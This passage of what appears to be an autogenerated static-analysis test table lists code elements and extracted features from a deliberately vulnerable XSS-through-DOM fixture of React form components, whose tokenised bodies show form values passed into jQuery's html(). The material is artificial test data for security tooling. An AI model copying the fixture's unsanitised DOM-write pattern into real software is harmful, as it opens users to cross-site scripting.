App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:16:78:28 | type="submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | assignedToPropName | type | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:21:78:28 | "submit" | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:78:32:79:4 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:78:32:79:4 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:78:32:79:4 | \\n | enclosingFunctionBody | register handleSubmit errors useForm onSubmit data $ #id html data name form onSubmit handleSubmit onSubmit \n input name name ref register required true \n input type submit \n | +| autogenerated/Xss/XssThroughDom/forms.js:78:32:79:4 | \\n | enclosingFunctionName | HookForm | +| autogenerated/Xss/XssThroughDom/forms.js:78:32:79:4 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | this | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | this | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | this | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | this | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | useForm | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | useForm | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | useForm | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:0 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:1 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:1 | getValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:1 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:1 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:83:1 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | 'arguments' object of function HookForm2 | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | 'arguments' object of function HookForm2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | 'arguments' object of function HookForm2 | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | 'arguments' object of function HookForm2 | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | 'arguments' object of function HookForm2 | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | exceptional return of function HookForm2 | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | exceptional return of function HookForm2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | exceptional return of function HookForm2 | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | exceptional return of function HookForm2 | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | exceptional return of function HookForm2 | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | functio ... \\n );\\n} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | functio ... \\n );\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | functio ... \\n );\\n} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | return of function HookForm2 | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | return of function HookForm2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | return of function HookForm2 | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | return of function HookForm2 | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:83:1:99:1 | return of function HookForm2 | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:83:10:83:18 | HookForm2 | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:83:10:83:18 | HookForm2 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:83:10:83:18 | HookForm2 | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:31 | { regis ... alues } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:31 | { regis ... alues } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:31 | { regis ... alues } | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:31 | { regis ... alues } | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:31 | { regis ... alues } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | getValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | { regis ... eForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | { regis ... eForm() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | { regis ... eForm() | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | { regis ... eForm() | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:9:84:43 | { regis ... eForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:11:84:18 | register | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:21:84:29 | getValues | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:41 | useForm | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:41 | useForm | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:41 | useForm | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:41 | useForm | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:41 | useForm | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | exceptional return of useForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | exceptional return of useForm() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | exceptional return of useForm() | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | exceptional return of useForm() | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | exceptional return of useForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | useForm() | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | useForm() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | useForm() | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | useForm() | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:84:35:84:43 | useForm() | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:86:10:98:3 | (\\n < ... rm>\\n ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:86:10:98:3 | (\\n < ... rm>\\n ) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:86:10:98:3 | (\\n < ... rm>\\n ) | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:86:10:98:3 | (\\n < ... rm>\\n ) | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:86:10:98:3 | (\\n < ... rm>\\n ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:87:5:97:11 | \\n ... | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:87:5:97:11 |
    \\n ...
    | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:87:5:97:11 |
    \\n ...
    | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:87:5:97:11 |
    \\n ...
    | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:87:5:97:11 |
    \\n ...
    | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:87:6:87:9 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:87:6:87:9 | form | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:87:6:87:9 | form | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:87:6:87:9 | form | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:87:6:87:9 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:87:11:88:6 | \\n | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:87:11:88:6 | \\n | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:87:11:88:6 | \\n | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:87:11:88:6 | \\n | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:87:11:88:6 | \\n | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:7:88:42 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:7:88:42 | | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:7:88:42 | | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:7:88:42 | | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:7:88:42 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:8:88:12 | input | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:8:88:12 | input | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:8:88:12 | input | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:8:88:12 | input | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:8:88:12 | input | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:17 | name | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:17 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:17 | name | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:17 | name | enclosingFunctionName | HookForm2 | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:17 | name | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | +| autogenerated/Xss/XssThroughDom/forms.js:88:14:88:24 | name="name" | enclosingFunctionBody | register getValues useForm form \n input name name ref register \n button type button onClick values getValues $ #id html values name \n \n | 